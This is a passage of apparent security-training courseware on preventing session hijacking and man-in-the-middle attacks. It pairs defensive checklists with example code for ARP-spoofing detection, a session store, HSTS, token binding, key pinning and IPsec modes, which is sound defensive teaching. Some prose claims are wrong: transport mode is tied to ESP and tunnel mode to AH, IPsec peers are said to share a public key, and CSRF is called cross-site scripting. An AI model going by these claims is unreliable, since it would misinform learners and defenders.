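    (30.0, "192.168.0.1", "de:ad:be:ef:00:99"),   # gateway IP now claimed by another MAC
    (30.5, "192.168.0.1", "de:ad:be:ef:00:99"),   # repeated unsolicited updates
    (31.0, "192.168.0.1", "de:ad:be:ef:00:99"),
    (31.5, "192.168.0.1", "de:ad:be:ef:00:99"),
    (60.0, "192.168.0.20", "aa:bb:cc:00:00:20"),
]


def detect_arp_poisoning(events, burst_window=10.0, burst_threshold=3):
    """Return alerts for (a) an IP whose advertised MAC changes and (b) a burst
    of replies for one IP inside burst_window seconds. Events must be sorted
    by time, as a capture would be."""
    current = {}               # ip -> MAC most recently advertised
    recent = defaultdict(deque)  # ip -> timestamps inside the burst window
    alerts = []
    for t, ip, mac in events:
        prev = current.get(ip)
        if prev is not None and prev != mac:
            alerts.append(("mac_change", t, ip, prev, mac))
        current[ip] = mac

        window = recent[ip]
        window.append(t)
        while window and t - window[0] > burst_window:
            window.popleft()
        if len(window) == burst_threshold:  # fire once, when the threshold is crossed
            alerts.append(("reply_burst", t, ip, len(window)))
    return alerts


def suspicious_hosts(alerts):
    """IPs named in any alert, the candidates for a forced (static) ARP entry."""
    return sorted({a[2] for a in alerts})
```

A mac_change on the default gateway's address is the signature of the ARP spoofing MITM above; the burst is the repeated updates the spoofer has to keep sending to keep the poisoned cache entry alive. The response the text prescribes is a forced ARP entry for the affected host, which pins the legitimate MAC so later forged replies are ignored.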
Protecting against Session Hijacking

• Use Secure Shell (SSH) to create a secure communication channel.
• Pass authentication cookies over HTTPS connections.
• Implement the log-out functionality for the user to end the session.
• Generate a session ID after a successful login and accept session IDs generated by the server only.
• Ensure that data in transit are encrypted and implement the defense-in-depth mechanism.
• Use strings or long random numbers as session keys.
• Use different usernames and passwords for different accounts.
• Educate employees and minimize remote access.
• Implement timeout() to destroy sessions when expired.
• Avoid including the session ID in the URL or query string.
• Use switches rather than hubs and limit incoming connections.
• Ensure client-side and server-side protection software are in the active state and up to date.
• Use strong authentication (such as Kerberos) or peer-to-peer virtual private networks (VPNs).
• Configure appropriate internal and external spoof rules on gateways.
• Use IDS products or ARPwatch for monitoring ARP cache poisoning.
• Use encrypted protocols available in the OpenSSH suite.
• Use firewalls and browser settings to confine cookies.
• Protect authentication cookies with SSL.
• Regularly update platform patches to fix TCP/IP vulnerabilities (e.g., predictable packet sequences).
• Use IPsec to encrypt session information.
• Use HTTP Public Key Pinning (HPKP) to allow users to authenticate web servers.
• Enable browsers to verify website authenticity using network notary servers.
• Implement DNS-based authentication of named entities.
• Disable compression mechanisms of HTTP requests.
• Use cipher-block chaining (CBC) ciphers incorporating random padding up to 255 bytes, thereby making the extraction of confidential information difficult for an attacker.
• Restrict the cross-site scripts known as cross-site request forgery (CSRF) from the client side.
• Upgrade web browsers to the latest versions.
• Use vulnerability scanners such as masscan to detect any insecure configuration of HTTPS session settings on sites.
Web Development Guidelines to Prevent Session Hijacking

An attacker usually hijacks a session by exploiting the vulnerabilities in mechanisms used for session establishment. Web developers often ignore security. During the development process, web developers should consider the following guidelines to minimize/eliminate the risk of session hijacking.

• Create session keys with lengthy strings or random numbers so that it is difficult for an attacker to guess a valid session key.
• Regenerate the session ID after a successful login to prevent session fixation attacks.
• Encrypt the data and session key transferred between the user and web servers.
• Implement the Secure Sockets Layer (SSL) to encrypt all the information in transit via the network.
• Make the session expire as soon as the user logs out.
• Prevent eavesdropping within the network.
• Reduce the life span of a session or cookie.
• Use restrictive cache directives for all the web traffic through HTTP and HTTPS, such as the "Cache-Control: no-cache, no-store" and "Pragma: no-cache" HTTP headers and/or equivalent META tags on all or (at least) sensitive web pages.
• Do not create sessions for unauthenticated users unless necessary.
• Ensure the HTTPOnly flag while using cookies for session IDs.
• Use a secure flag to send cookies in HTTPS requests and encrypt them before sending across the network.
• Check whether all the requests received for the current session originate from the same IP address and user agent.
• Implement continuous device verification to identify whether the user who established the session is still in control.
• Implement risk-based authentication at different levels before granting access to sensitive information.
• Perform authentication and integrity verification between VPN endpoints.
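A server-side session store that applies the session-handling guidelines from this section and from the countermeasure list above (server-generated random IDs, regeneration at login, acceptance of server-issued IDs only, IP and user-agent binding, expiry on logout and idle timeout), as an added Python example that is not EC-Council's or any framework's code. SessionStore and its methods are this example's names; the clock parameter exists only so the timeout can be exercised without waiting. Read together with the session donation attack earlier in this module: a donated ID that the server did issue is still rejected when the victim's request arrives from a different address or browser, and an ID the server never issued is simply unknown.

```python
import secrets
import time


class SessionStore:
    """Session IDs live only in this store; a client can present an ID but can
    never make the server adopt one it did not generate."""

    ID_BYTES = 32  # 256 bits of randomness per ID

    def __init__(self, idle_timeout=900, clock=time.time):
        self._sessions = {}
        self.idle_timeout = idle_timeout
        self.clock = clock  # injectable for tests; defaults to wall-clock time

    def _new_id(self):
        return secrets.token_urlsafe(self.ID_BYTES)

    def start(self, ip, user_agent):
        """Anonymous session. Any ID the client already carries is ignored."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "ip": ip, "ua": user_agent, "last": self.clock()}
        return sid

    def login(self, presented_sid, user, ip, user_agent):
        """Discard the pre-login ID (fixation/donation defence) and issue a
        fresh one bound to the authenticated user and the client seen now."""
        self._sessions.pop(presented_sid, None)
        sid = self._new_id()
        self._sessions[sid] = {"user": user, "ip": ip, "ua": user_agent, "last": self.clock()}
        return sid

    def resolve(self, presented_sid, ip, user_agent):
        """Return the user for a request, or None if the ID is unknown, expired,
        or presented from a different IP / user agent than it was bound to."""
        s = self._sessions.get(presented_sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["last"] > self.idle_timeout:
            del self._sessions[presented_sid]
            return None
        if (ip, user_agent) != (s["ip"], s["ua"]):
            del self._sessions[presented_sid]  # treat as a hijack attempt: tear down
            return None
        s["last"] = now
        return s["user"]

    def logout(self, presented_sid):
        """Explicit logout destroys the session server-side, not just the cookie."""
        return self._sessions.pop(presented_sid, None) is not None
```

The ID should travel only in a cookie with the Secure and HttpOnly flags, never in a URL or query string, as the guidelines above require; the store itself does not care how the ID arrived, only whether it issued it.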
Web User Guidelines to Prevent Session Hijacking

The following are some guidelines for web users to defend against session hijacking.
• Do not click on links received through emails or instant messages (IMs).
• Use firewalls to prevent malicious content from entering the network.
• Use firewalls and browser settings to restrict cookies.
• Ensure that the website is certified by appropriate certifying authorities.
• Ensure that the history, offline content, and cookies are cleared from the browser after every confidential and sensitive transaction.
• Give preference to HTTPS, a secure transmission protocol, over HTTP when transmitting sensitive and confidential data.
• Log out from the browser by clicking on the logout button instead of closing the browser.
• Verify and disable add-ons from untrusted sites. Enable add-ons only if necessary.
• Practice using a one-time password for critical data transactions (e.g., credit card transactions).
• Frequently update anti-virus signatures to prevent the automatic installation of malware that attempts to steal cookies.
Session Hijacking Detection Tools

Session hijacking attacks are difficult to detect, and in most cases, attacks go unnoticed, causing severe leakage of confidential data. Tools such as packet sniffers, IDSs, and security information and event management (SIEM) can be used to detect session hijacking attacks.

• AlienVault USM
Source: https://www.alienvault.com
AlienVault Unified Security Management (USM) offers powerful threat detection, incident response, and compliance management across cloud, on-premises, and hybrid environments. Security professionals can use this tool for detecting session hijacking attempts and perform asset discovery, intrusion detection, security automation, SIEM and log management, endpoint detection and response, threat detection, threat intelligence, and vulnerability assessment.

Figure 11.31: Screenshot of AlienVault USM
• Wireshark
Source: https://www.wireshark.org
Wireshark allows users to capture and interactively browse the traffic on a network. This tool uses Winpcap to capture packets. Therefore, it can only capture packets on the networks supported by Winpcap. It captures live network traffic from Ethernet, IEEE 802.11, Point-to-Point Protocol/High-level Data Link Control (PPP/HDLC), Asynchronous Transfer Mode (ATM), Bluetooth, Universal Serial Bus (USB), Token Ring, Frame Relay, and Fiber Distributed Data Interface (FDDI) networks. Security professionals use Wireshark to monitor and detect session hijacking attempts.

Figure 11.32: Screenshot of Wireshark

The following are some additional session hijacking detection tools:
• Check Point IPS Software Blade (https://www.checkpoint.com)
• LogRhythm (https://logrhythm.com)
• SolarWinds Log & Event Manager (https://www.solarwinds.com)
• IBM Security Network Intrusion Prevention System (https://www.ibm.com)
Approaches
Causing to SessionHijacking
Vulnerability andtheir Preventative
Solutions
Implementing encryption and signing protocols preventsattackersfrom hijacking
sessions.
Belowtable lists various issues and their respectivesolutionsthat,upon implementation,
preventor impede the hijackingofa validsession.

Solution | Notes
SSH (Secure Shell) or OpenSSH | It sends encrypted data and makes it difficult for an attacker to send correctly encrypted data if a session is hijacked.
SSH FTP (SFTP), Applicability Statement 2 (AS2), managed FTP | Implementing these protocols reduces the chance of session hijacking.
Secure Sockets Layer (SSL) or Transport Layer Security (TLS) | It reduces the chances of a successful hijack.
IPsec | It prevents hijacking by securing IP communications.
Any remote connection: virtual private network (VPN) | Implementing encrypted connections such as VPNs, PPTP, Layer 2 Tunneling Protocol (L2TP), and IPsec for remote connections prevents session hijacking.
SMB signing | It improves the security of the SMB protocol and reduces the chances of session hijacking.
Hub network to switch network | It mitigates the risk of ARP spoofing and other session hijacking attacks.

Table 11.1: Approaches causing vulnerability to session hijacking and their preventative solutions

Approaches to Prevent Session Hijacking

▪ HTTP Strict Transport Security (HSTS)
HTTP Strict Transport Security (HSTS) is a web security policy that protects HTTPS websites against MITM attacks. The HSTS policy helps web servers force web browsers to interact with them using HTTPS. With the HSTS policy, all insecure HTTP connections are automatically converted into HTTPS connections. This policy ensures that all the communication between a web server and web browser is encrypted and that all responses that are delivered and received originate from an authenticated server.

Figure: Web client sending an HTTPS request to the web server (HSTS)
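As an added example (not code from the EC-Council courseware), the following Go program shows the client side of the HSTS policy just described: it parses a Strict-Transport-Security header, keeps a small "known HSTS hosts" list the way a browser does, and decides whether a plain http:// request must be upgraded before anything is sent on the network. The host names and the header value are constructed for the example.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
	"strings"
	"time"
)

// HSTSPolicy is the parsed form of one Strict-Transport-Security header value.
type HSTSPolicy struct {
	MaxAge            time.Duration
	IncludeSubDomains bool
}

// ParseHSTS parses a header value as RFC 6797 describes it: directives separated by ';',
// names case-insensitive, and max-age mandatory (a header without it is invalid and ignored).
func ParseHSTS(value string) (HSTSPolicy, error) {
	var p HSTSPolicy
	seenMaxAge := false
	for _, directive := range strings.Split(value, ";") {
		parts := strings.SplitN(strings.TrimSpace(directive), "=", 2)
		name, arg := strings.ToLower(strings.TrimSpace(parts[0])), ""
		if len(parts) == 2 {
			arg = strings.Trim(strings.TrimSpace(parts[1]), `"`)
		}
		switch name {
		case "max-age":
			secs, err := strconv.ParseInt(arg, 10, 64)
			if err != nil || secs < 0 {
				return HSTSPolicy{}, fmt.Errorf("invalid max-age %q", arg)
			}
			p.MaxAge = time.Duration(secs) * time.Second
			seenMaxAge = true
		case "includesubdomains":
			p.IncludeSubDomains = true
		}
	}
	if !seenMaxAge {
		return HSTSPolicy{}, errors.New("max-age directive missing")
	}
	return p, nil
}

// hstsEntry is what the client keeps for one known HSTS host.
type hstsEntry struct {
	expires           time.Time
	includeSubDomains bool
}

// HSTSStore is a minimal in-memory "known HSTS hosts" list.
type HSTSStore struct{ hosts map[string]hstsEntry }

func NewHSTSStore() *HSTSStore { return &HSTSStore{hosts: map[string]hstsEntry{}} }

// Remember records a policy that arrived in an HTTPS response from host.
// A max-age of 0 tells the client to forget the host, as the RFC specifies.
func (s *HSTSStore) Remember(host string, p HSTSPolicy, now time.Time) {
	host = strings.ToLower(host)
	if p.MaxAge == 0 {
		delete(s.hosts, host)
		return
	}
	s.hosts[host] = hstsEntry{expires: now.Add(p.MaxAge), includeSubDomains: p.IncludeSubDomains}
}

// ShouldUpgrade reports whether a plain http:// request to host must be rewritten to https://
// before any traffic is sent: the host itself, or a parent domain whose policy carries
// includeSubDomains, must have an unexpired entry.
func (s *HSTSStore) ShouldUpgrade(host string, now time.Time) bool {
	labels := strings.Split(strings.ToLower(host), ".")
	for i := range labels {
		e, ok := s.hosts[strings.Join(labels[i:], ".")]
		if !ok || now.After(e.expires) {
			continue
		}
		if i == 0 || e.includeSubDomains {
			return true
		}
	}
	return false
}

func main() {
	now := time.Now()
	store := NewHSTSStore()
	// Constructed header value, as a site would send it over HTTPS (not taken from any real site).
	policy, err := ParseHSTS("max-age=31536000; includeSubDomains")
	if err != nil {
		panic(err)
	}
	store.Remember("example.com", policy, now)
	fmt.Println("upgrade http://login.example.com ->", store.ShouldUpgrade("login.example.com", now))
	fmt.Println("upgrade http://example.org ->", store.ShouldUpgrade("example.org", now))
}
```

The lookup walks from the full host name up to its parent domains, so a policy set by example.com with includeSubDomains also covers login.example.com, while a policy without that directive protects only the exact host; expired entries are ignored rather than deleted, which keeps the store logic short.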

▪ Token Binding
When a user logs into a web application, a cookie with a session ID, called a token, is generated. The user utilizes this random token to send requests to the server and access resources. An attacker can impersonate the user and hijack the connection by capturing client-server communication and reusing a valid session ID. Token binding protects against session hijacking attacks. The client creates a public-private key pair for every connection to a remote server. When a client connects to the server, it generates a signature using a private key and sends this signature along with its public key to the server. The server verifies the signature using the client's public key. This ensures that the message was sent by an authentic client because only the client has its private key. Even if an attacker captures the signature, it is not possible for them to regenerate the signature or reuse it for another connection. For every new connection, a new pair of public and private keys are used.

Figure: Token binding between the web browser and the web server
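The client-server exchange described above, as an added example written for this text rather than taken from the courseware: the client holds a fresh Ed25519 key pair per connection, the server binds each issued token to the client's public key, and verification rejects a captured token presented with a different key or with a replayed signature. The user name, token format, and the server-chosen challenge that is signed together with the token are assumptions of the example.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Client holds the key pair the text describes: one fresh pair per connection to a server.
type Client struct {
	Pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

// NewClient generates the per-connection key pair.
func NewClient() (*Client, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Client{Pub: pub, priv: priv}, nil
}

// Request is what the client sends with every call: the session token, its public key, and a
// signature over the token and a server-chosen challenge (constructed detail of this example;
// the challenge is what stops a captured signature from being replayed later).
type Request struct {
	Token     string
	Challenge []byte
	PubKey    ed25519.PublicKey
	Signature []byte
}

// bindingMessage is the exact byte string that is signed and verified.
func bindingMessage(token string, challenge []byte) []byte {
	h := sha256.New()
	h.Write([]byte(token))
	h.Write(challenge)
	return h.Sum(nil)
}

// MakeRequest signs (token, challenge) with the connection's private key.
func (c *Client) MakeRequest(token string, challenge []byte) Request {
	return Request{Token: token, Challenge: challenge, PubKey: c.Pub,
		Signature: ed25519.Sign(c.priv, bindingMessage(token, challenge))}
}

// boundSession is the server's record: a token is valid only together with the key it was bound to.
type boundSession struct {
	user   string
	pubKey ed25519.PublicKey
}

// Server keeps issued tokens and their bound keys (in memory, for the example).
type Server struct{ sessions map[string]boundSession }

func NewServer() *Server { return &Server{sessions: map[string]boundSession{}} }

// Login issues a random session token and binds it to the client's public key.
func (s *Server) Login(user string, clientPub ed25519.PublicKey) (string, error) {
	raw := make([]byte, 16)
	if _, err := rand.Read(raw); err != nil {
		return "", err
	}
	token := hex.EncodeToString(raw)
	s.sessions[token] = boundSession{user: user, pubKey: clientPub}
	return token, nil
}

// NewChallenge returns a fresh random value the client must sign along with the token.
func (s *Server) NewChallenge() ([]byte, error) {
	c := make([]byte, 16)
	_, err := rand.Read(c)
	return c, err
}

// Verify accepts a request only if the token is known, the presented key is the one the token
// was bound to, the challenge is the one issued for this exchange, and the signature checks out.
func (s *Server) Verify(r Request, issuedChallenge []byte) (string, error) {
	sess, ok := s.sessions[r.Token]
	if !ok {
		return "", errors.New("unknown token")
	}
	if !bytes.Equal(sess.pubKey, r.PubKey) {
		return "", errors.New("token is not bound to the presented public key")
	}
	if !bytes.Equal(r.Challenge, issuedChallenge) {
		return "", errors.New("challenge mismatch: possible replay")
	}
	if !ed25519.Verify(sess.pubKey, bindingMessage(r.Token, r.Challenge), r.Signature) {
		return "", errors.New("invalid signature")
	}
	return sess.user, nil
}

func main() {
	srv := NewServer()
	legit, _ := NewClient()
	token, _ := srv.Login("alice", legit.Pub)
	ch, _ := srv.NewChallenge()
	user, err := srv.Verify(legit.MakeRequest(token, ch), ch)
	fmt.Println("legitimate client:", user, err)
	other, _ := NewClient() // a second connection presenting the captured token with its own key
	ch2, _ := srv.NewChallenge()
	_, err = srv.Verify(other.MakeRequest(token, ch2), ch2)
	fmt.Println("captured token, different key:", err)
}
```

Note that the signature alone is not enough: without the server-chosen challenge, a captured request could be resubmitted verbatim, which is why the verification step also compares the challenge in the request with the one it issued.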

▪ HTTP Public Key Pinning (HPKP)
HTTP Public Key Pinning (HPKP) is a trust on first use (TOFU) technique used in an HTTP header that allows a web client to associate a specific public key certificate with a particular server to minimize the risk of MITM attacks based on fraudulent certificates. In TLS sessions, to verify the authenticity of a server's public key, the public key is enclosed in an X.509 digital certificate, which is signed by a certification authority (CA). By compromising any CA, attackers can perform MITM attacks on various TLS sessions. HPKP protects TLS sessions from such attacks by delivering to the web client the list of public keys owned by a web server. When the client connects to the server, it verifies the public keys in the certificate chain obtained using HPKP. If the server sends any unidentified public key, the client issues a warning message to the user.
Figure: Server sending its public keys to the client using HPKP
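An added example (not from the courseware) of the HPKP check in Go, using only the standard library: it computes the pin RFC 7469 defines (SHA-256 over the certificate's SubjectPublicKeyInfo, base64-encoded), parses a Public-Key-Pins header, and accepts a served certificate chain only if it carries a pinned key. The certificates are self-signed throwaways generated at run time so the example works offline; the host name and max-age are constructed.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/base64"
	"errors"
	"fmt"
	"math/big"
	"strings"
	"time"
)

// SPKIPin computes the pin RFC 7469 defines: base64(SHA-256(DER SubjectPublicKeyInfo)).
// Pinning the key rather than the certificate lets a site renew the certificate without changing the pin.
func SPKIPin(cert *x509.Certificate) (string, error) {
	spki, err := x509.MarshalPKIXPublicKey(cert.PublicKey)
	if err != nil {
		return "", err
	}
	sum := sha256.Sum256(spki)
	return base64.StdEncoding.EncodeToString(sum[:]), nil
}

// ParsePinHeader parses `pin-sha256="..."; pin-sha256="..."; max-age=N [; includeSubDomains]`.
// RFC 7469 requires at least two pins (one for a backup key), so a header with fewer is rejected.
func ParsePinHeader(value string) (pins []string, maxAge int64, err error) {
	seenMaxAge := false
	for _, d := range strings.Split(value, ";") {
		parts := strings.SplitN(strings.TrimSpace(d), "=", 2)
		name, arg := strings.ToLower(strings.TrimSpace(parts[0])), ""
		if len(parts) == 2 {
			arg = strings.Trim(strings.TrimSpace(parts[1]), `"`)
		}
		switch name {
		case "pin-sha256":
			if raw, e := base64.StdEncoding.DecodeString(arg); e != nil || len(raw) != sha256.Size {
				return nil, 0, fmt.Errorf("malformed pin %q", arg)
			}
			pins = append(pins, arg)
		case "max-age":
			if _, e := fmt.Sscanf(arg, "%d", &maxAge); e != nil {
				return nil, 0, fmt.Errorf("malformed max-age %q", arg)
			}
			seenMaxAge = true
		}
	}
	if !seenMaxAge {
		return nil, 0, errors.New("max-age missing")
	}
	if len(pins) < 2 {
		return nil, 0, errors.New("at least two pins (one backup) are required")
	}
	return pins, maxAge, nil
}

// ChainMatchesPins is the client's check on a later connection: accept only if some certificate
// in the served chain carries a pinned key; otherwise the client warns the user.
func ChainMatchesPins(chain []*x509.Certificate, pins []string) (bool, error) {
	for _, cert := range chain {
		pin, err := SPKIPin(cert)
		if err != nil {
			return false, err
		}
		for _, want := range pins {
			if pin == want {
				return true, nil
			}
		}
	}
	return false, nil
}

// selfSignedCert makes a throwaway certificate so the example runs offline (constructed test data).
func selfSignedCert(cn string) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: cn},
		NotBefore: time.Now(), NotAfter: time.Now().Add(24 * time.Hour)}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

func main() {
	site, _ := selfSignedCert("example.com")
	backup, _ := selfSignedCert("example.com") // second key pair kept offline as the backup pin
	sitePin, _ := SPKIPin(site)
	backupPin, _ := SPKIPin(backup)
	pins, _, err := ParsePinHeader(fmt.Sprintf(`pin-sha256="%s"; pin-sha256="%s"; max-age=5184000`, sitePin, backupPin))
	if err != nil {
		panic(err)
	}
	ok, _ := ChainMatchesPins([]*x509.Certificate{site}, pins)
	fmt.Println("served certificate carries a pinned key:", ok)
	rogue, _ := selfSignedCert("example.com") // same name, different key: the fraudulent-certificate case
	ok, _ = ChainMatchesPins([]*x509.Certificate{rogue}, pins)
	fmt.Println("certificate from an unpinned key accepted:", ok)
}
```

The "rogue" certificate in main carries the same subject name as the pinned one, which is exactly the case a compromised CA makes possible; because its key differs, its pin differs and the client rejects it. The two-pin minimum is the RFC's guard against a site locking out its own users after a key loss.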
Approaches to Prevent MITM Attacks
Man-in-the-middle (MITM) attacks are the most common attacks in which the attackers can intercept the traffic between two endpoints. The victim may not realize the effect of this attack, because it is mostly passive in nature. Because the detection of MITM attacks is difficult, they can only be prevented using various measures. The following are some approaches to prevent MITM attacks:
▪ WEP/WPA Encryption
Wired Equivalent Privacy (WEP) and Wireless Protected Access (WPA) are wireless protocols that are intended to protect the traffic that is sent and received by users over a wireless network. The implementation of these protocols can thwart the attempts of unwanted users to connect to the network. A weak encryption mechanism enables attackers to brute force credentials and enter the target network to perform an MITM attack.
▪ VPN
A VPN creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information. It creates a subnet by using key-based encryption for secure communication between endpoints. The implementation of a VPN in the network prevents attackers from decrypting the data flowing between the endpoints.
▪ Two-Factor Authentication
Two-factor authentication provides an extra layer of protection because it serves as a vector of authentication in addition to a user's password. Therefore, the implementation of two-factor authentication can prevent attackers from performing session hijacking and brute forcing to compromise a user's account.
IPsec
Internet Protocol Security (IPsec) is a set of protocols that the Internet Engineering Task Force (IETF) developed to support the secure exchange of packets at the IP layer. It ensures interoperable cryptographically based security for IPv4 and IPv6, and it supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection. It is widely used to implement VPNs and for remote user access through dial-up connection to private networks. It supports transport and tunnel encryption modes, although sending and receiving devices must share a public key.
IPsec policies can be assigned through the Group Policy configuration of Active Directory domains, organizational units, and IPsec deployment policies at the domain, site, or organizational-unit level. The security services offered by IPsec include the following:
▪ Rejection of replayed packets (a form of partial sequence integrity)
▪ Data confidentiality (encryption)
▪ Access control
▪ Connectionless integrity
▪ Data origin authentication
▪ Data integrity
▪ Limited traffic-flow confidentiality
▪ Network-level peer authentication
▪ Replay protection
At the IP layer, IPsec provides all the above-mentioned services, offering the protection of IP and/or upper-layer protocols such as TCP, UDP, ICMP, and Border Gateway Protocol (BGP).
Components of IPsec
▪ IPsec driver: Software that performs protocol-level functions required to encrypt and decrypt packets.
▪ Internet Key Exchange (IKE): A protocol that produces security keys for IPsec and other protocols.
▪ Internet Security Association and Key Management Protocol (ISAKMP): Software that allows two computers to communicate by encrypting the data exchanged between them.
▪ Oakley: A protocol that uses the Diffie-Hellman algorithm to create a master key and a key that is specific to each session in IPsec data transfer.
▪ IPsec Policy Agent: A service included in Windows OS that enforces IPsec policies for all the network communications initiated from that system.
The following are the steps involved in the IPsec process.
▪ A consumer sends a message to a service provider.
▪ The consumer's IPsec driver attempts to match the outgoing packet's address or the packet type against the IP filter.
▪ The IPsec driver notifies ISAKMP to initiate security negotiations with the service provider.
▪ The service provider's ISAKMP receives the security negotiation request.
▪ Both principals initiate a key exchange, establishing an ISAKMP Security Association (SA) and a shared secret key.
▪ Both principals discuss the security level for the information exchange, establishing both IPsec SAs and keys.
▪ The consumer's IPsec driver transfers packets to the appropriate connection type for transmission to the service provider.
▪ The provider receives the packets and transfers them to the IPsec driver.
▪ The provider's IPsec uses the inbound SA and key to check the digital signature and begin decryption.
▪ The provider's IPsec driver transfers decrypted packets to the OSI transport layer for further processing.
Modes of IPsec
The configuration of IPsec involves two different modes: the tunnel mode and transport mode. These modes are associated with the functions of two core protocols: the Encapsulation Security Payload (ESP) and Authentication Header (AH). The mode selection depends on the requirements and implementation of IPsec.
▪ Transport Mode
In the transport mode (also ESP), IPsec encrypts only the payload of the IP packet, leaving the header untouched. It authenticates two connected computers and provides the option of encrypting data transfer. It is compatible with network address translation (NAT); therefore, it can be used to provide VPN services for networks utilizing NAT.

Figure 11.36: Transport mode encapsulation

▪ Tunnel Mode
In the tunnel mode (also AH), IPsec encrypts both the payload and header. Hence, the tunnel mode has higher security than the transport mode. After receiving the data, the IPsec-compliant device performs decryption. The tunnel mode is used to create VPNs over the Internet for network-to-network communication (e.g., between routers and link sites), host-to-network communication (e.g., remote user access), and host-to-host communication (e.g., private chat). It is compatible with NAT and supports NAT traversal.
In the tunnel mode, the system encrypts entire IP packets (payload and IP header) and encapsulates the encrypted packets into a new IP packet with a new header. In this mode, ESP encrypts and optionally authenticates entire inner IP packets, whereas AH authenticates entire inner IP packets and selected fields of outer IP headers. The tunnel mode is usually useful between two gateways or between a host and gateway.

Figure: Tunnel mode encapsulation
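To make the difference between the two modes concrete, the following Go program is an added example (not EC-Council's code) that models an IP packet as source, destination and payload and applies ESP-style confidentiality with AES-GCM in each mode: transport mode seals only the payload and leaves the header readable, while tunnel mode seals the whole inner packet and wraps it in a new packet addressed between two gateways. The packet layout, key and addresses are constructed for the example; the real ESP header and trailer fields (SPI, sequence number, padding) are not reproduced.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
	"io"
	"net"
)

// Packet is a stripped-down IP packet: the addresses an on-path observer can read, plus the payload.
type Packet struct {
	Src, Dst net.IP
	Payload  []byte
}

// Marshal serializes as 4-byte src, 4-byte dst, 2-byte payload length, payload (constructed layout).
func (p Packet) Marshal() []byte {
	b := make([]byte, 10, 10+len(p.Payload))
	copy(b[0:4], p.Src.To4())
	copy(b[4:8], p.Dst.To4())
	binary.BigEndian.PutUint16(b[8:10], uint16(len(p.Payload)))
	return append(b, p.Payload...)
}

// Unmarshal is the inverse of Marshal.
func Unmarshal(b []byte) (Packet, error) {
	if len(b) < 10 || len(b) != 10+int(binary.BigEndian.Uint16(b[8:10])) {
		return Packet{}, errors.New("malformed packet")
	}
	return Packet{Src: net.IPv4(b[0], b[1], b[2], b[3]), Dst: net.IPv4(b[4], b[5], b[6], b[7]),
		Payload: append([]byte(nil), b[10:]...)}, nil
}

// newGCM builds the AEAD that stands in for ESP's confidentiality and integrity services.
func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// seal encrypts and authenticates plaintext, prepending a random nonce.
func seal(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// open reverses seal; any change to the sealed bytes makes it fail (the integrity check).
func open(key, sealed []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if len(sealed) < gcm.NonceSize() {
		return nil, errors.New("sealed data too short")
	}
	return gcm.Open(nil, sealed[:gcm.NonceSize()], sealed[gcm.NonceSize():], nil)
}

// TransportMode seals only the payload; the original header, and so the real endpoints, stays visible.
func TransportMode(p Packet, key []byte) (Packet, error) {
	sealed, err := seal(key, p.Payload)
	return Packet{Src: p.Src, Dst: p.Dst, Payload: sealed}, err
}

// TransportOpen recovers the payload at the peer host.
func TransportOpen(p Packet, key []byte) (Packet, error) {
	plain, err := open(key, p.Payload)
	return Packet{Src: p.Src, Dst: p.Dst, Payload: plain}, err
}

// TunnelMode seals the entire inner packet (header and payload) and wraps it in a new packet
// addressed between the two gateways, so the inner addresses are hidden on the wire.
func TunnelMode(inner Packet, key []byte, gwSrc, gwDst net.IP) (Packet, error) {
	sealed, err := seal(key, inner.Marshal())
	return Packet{Src: gwSrc, Dst: gwDst, Payload: sealed}, err
}

// TunnelOpen is the receiving gateway's step: decrypt, then hand on the inner packet.
func TunnelOpen(outer Packet, key []byte) (Packet, error) {
	plain, err := open(key, outer.Payload)
	if err != nil {
		return Packet{}, err
	}
	return Unmarshal(plain)
}

func main() {
	key := make([]byte, 32) // constructed demo key; real IPsec keys are negotiated by IKE
	io.ReadFull(rand.Reader, key)
	inner := Packet{Src: net.IPv4(10, 0, 0, 5), Dst: net.IPv4(10, 0, 1, 7), Payload: []byte("GET / HTTP/1.1")}
	tp, _ := TransportMode(inner, key)
	tn, _ := TunnelMode(inner, key, net.IPv4(203, 0, 113, 1), net.IPv4(198, 51, 100, 1))
	fmt.Printf("transport mode on the wire: %s -> %s, %d encrypted bytes\n", tp.Src, tp.Dst, len(tp.Payload))
	fmt.Printf("tunnel mode on the wire:    %s -> %s, %d encrypted bytes\n", tn.Src, tn.Dst, len(tn.Payload))
}
```

Running main shows the point of the two figures: in transport mode the wire still carries 10.0.0.5 and 10.0.1.7, whereas in tunnel mode only the gateway addresses appear and the inner header is part of the ciphertext. AES-GCM also authenticates what it encrypts, so the example mirrors ESP with integrity enabled; a modified packet fails in TunnelOpen or TransportOpen instead of being delivered.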

IPsec Architecture
IPsec offers security services at the network layer. This provides the freedom to select the required security protocols as well as the algorithms used for services. To provide the requested services, the corresponding cryptographic keys can be employed, if required. Security services offered by IPsec include access control, data origin authentication, connectionless integrity, anti-replay, and confidentiality. To meet these objectives, IPsec uses two traffic security protocols, AH and ESP, as well as cryptographic key management protocols and procedures.
